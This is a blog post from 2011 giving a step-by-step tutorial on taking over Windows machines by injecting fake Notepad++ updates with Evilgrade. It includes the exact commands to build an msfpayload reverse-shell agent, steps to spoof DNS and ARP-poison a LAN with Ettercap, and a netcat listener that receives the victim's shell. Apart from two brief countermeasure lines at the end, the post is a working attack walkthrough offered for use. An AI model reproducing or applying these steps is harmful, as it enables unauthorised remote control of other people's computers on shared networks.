border: 1px solid #d2d2d2; padding: 0px 8px 0px 8px; color: #a19999; font-size: 12px; height: 25px; width: 165px; border-radius: 5px; -moz-border-radius: 5px; -webkit-border-radius: 5px; margin:0px; } .submitbutton{ background:#F66303; border: 1px solid #F66303; text-shadow: 1px 1px 1px #333; box-shadow: 3px 3px 3px #666; font:bold 12px Arial, sans-serif; color: #fff; height: 25px; padding: 0 12px 0 12px; margin: 0 0 0 5px; border-radius: 5px; -moz-border-radius: 5px; -webkit-border-radius: 5px; cursor:pointer;}

Receive all updates via Facebook. Just Click the Like Button Below

You can also receive Free Email Updates:

Powered By Blogger Widgets

Related Posts Plugin for WordPress, Blogger...

Wednesday, June 29, 2011

15 Step to Hacking Windows Using Evilgrade 2.0 on Backtrack 5



What is Evilgrade? 
Evilgrade is a modular framework that allows the user to take advantage of poor upgrade implementations by injecting fake updates. It comes with pre-made binaries (agents), a working default configuration for fast pentests, and has it's own WebServer and DNSServer modules. Easy to set up new settings, and has an autoconfiguration when new binary agents are set.


From : http://www.infobytesec.com Requirement : 


1. Evilgrade 


2. Backtrack 5 


Step By Step : 


1. Extract Evilgrade then run it using the command below 


tar xvfz isr-evilgrade-2.0.0.tar.gz cd isr-evilgrade-2.0.0.tar.gz/ ./evilgrade 


If there's an error when you run the application, you can refer to my post about how to solve evilgrade error on Backtrack 5. below is the picture if you success run the application :



2. The next step is you need to determine the target of the application, because Evilgrade will create a fake update to inject the victim computer. To list all the supported application use


evilgrade>show modules 


List of modules: 
=============== 
allmynotes 
amsn 
appleupdate 
apptapp 
apt 
atube 
autoit3 
bbappworld 
blackberry 
bsplayer 
ccleaner 
clamwin 
cpan 
cygwin 
dap 
divxsuite 
express_talk 
fcleaner 
filezilla 
flashget 
flip4mac 
freerip 
getjar 
gom 
googleanalytics 
growl 
isopen 
istat 
itunes 
jet 
jetphot
linkedin 
miranda 
mirc 
nokia 
nokiasoftware 
notepadplus 
openoffice 
opera 
orbit 
osx 
paintnet 
panda_antirootkit 
photoscape 
quicktime 
skype 
sparkle 
speedbit 
sunbelt 
sunjava 
superantispyware 
teamviewer 
techtracker 
trillian 
ubertwitter 
vidbox 
virtualbox 
vmware 
winamp 
winscp 
winupdate 
winzip 
yahoomsn 


63 modules available. 


In this tutorial we will targeting user who use Notepad Plus, so when they're updating their application automatically it will caught in my trap. To use modules, simply run


evilgrade>configure notepadplus 


3. To view the options that you can set up use command show options.




in the image above there's VirtualHost that means when the victim update their notepad plus it will opening URL notepad-plus.sourceforge.net. later we will use this address. 


4. The next step is setting an agent. I'm configuring this agent to create shell_reverse_tcp using msfpayload. 


evilgrade(notepadplus)>set agent '["/pentest/exploits/framework3/msfpayload windows/shell_reverse_tcp LHOST=192.168.8.91 LPORT=1234 X > <%OUT%>/tmp/notepadplus.exe<%OUT%>"]' 


Explanation: 


/pentest/exploits/framework3/msfpayload –> We will load the msfpayload.


windows/shell_reverse_tcp –> We will use windows shell reverse tcp payload to open shell on target when operation succeeded. 


LHOST –> localhost you backtrack 5 ip address / attacker ip address. 


LPORT –> in which port you will interract with the victim when operation succedded. for further information about this you can refer to the readme file


5. The next step is we need to start the evilgrade server. Make sure your port 80 is empty. 








6. After finish setting up Evilgrade, we also need to configure the Man in the Middle attack using Ettercap, then redirect the connection to Evilgrade server when someone updating their notepad plus application. First step is you need to configure etter.dns . 


pico /usr/share/ettercap/etter.dns 




notepad-plus.sourceforge.net –> this address we get from no.3. 




7. For the next step we will use Ettercap 


"Ettercap is a suite for man in the middle attacks on LAN. It features sniffing of live connections, content filtering on the fly and many other interesting tricks. 


It supports active and passive dissection of many protocols (even ciphered ones) and includes many feature for network and host analysis."From : http://ettercap.sourceforge.net


To run Ettercap, open new terminal(Ctrl+Alt+T) run this command 


ettercap -G 


Click Sniff –> Unified sniffing –> choose your network interface card, in this case I'm using eth0. 


8. The next step we need to enable dns_spoof plugin this plugin used to redirect the request from victim to Evilgrade server. Click Plugins –> Manage the plugins –> Double click dns_spoof 




9. The next step is scan hosts in our network, this step is to determine the target. Click Hosts –> Scan for hosts. 


10. After listing all the hosts in the network, we need to set up the target. 


11. We also need to perform Man in the middle attack to intercept all data on network. Click Mitm –> Arp poisoning –> check "Sniff remote connection". 


12. After everything is set up correctly run the Ettercap to start sniffing. 




13. The next step we will use NetCat to listen on port 1234 that we already defined before when setting up Evilgrade. 


"Netcat is a featured networking utility which reads and writes data across network connections, using the TCP/IP protocol. 


It is designed to be a reliable "back-end" tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities." 


From : http://netcat.sourceforge.net 


Open new terminal(Ctrl+Alt+T) and run this command nc -l -v -p 1234 


Explanation : 


-l : to listen on any incoming connection 
-v : verbose -p : port to listen on 


14. When the user opening their Notepad Plus application and the application asking for update application automatically like the picture below and user answer YES. 




15. Our NetCat terminal will have something interesting because it's already on victim shell.


Countermeasure : 


1. It's better to download directly from the source than automatically update the application 


2. Always update your antivirus

No comments:

Post a Comment

Share

Twitter Delicious Facebook Digg Stumbleupon Favorites More